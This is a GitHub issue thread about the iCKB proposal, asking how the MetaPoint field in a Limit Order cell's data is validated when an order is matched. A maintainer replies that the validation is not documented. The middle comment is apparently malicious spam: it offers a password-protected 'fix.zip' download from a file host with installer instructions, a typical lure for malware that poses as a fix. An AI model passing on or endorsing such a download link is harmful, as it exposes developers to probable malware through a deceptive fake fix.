### ISSUE TITLE
MetaPoints validation in Limit Order Match

### ISSUE THREAD

**Issue by XuJiandong** [ickb/proposal#10]
This transaction can be simplified below:
```
CellDeps:
    - Limit Order data cell
    - ...
Inputs:
    - Limit Order cell:
        Data:
            - Amount (16 bytes),
            - MintOrderData variant of OrderData
Outputs:
    - Limit Order cell:
        Data:
            - Amount (16 bytes),
            - MatchOrderData variant of OrderData
```

How can we ensure that the MetaPoint in `data` section is properly restricted during the transaction?

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by phroi** [comment]
Hey @XuJiandong, thank you for publicly expressing your interest in iCKB by reviewing the proposal, I personally appreciate a lot!! 🙏

Limit Order's MetaPoint validation is not documented in the proposal, good catch!!
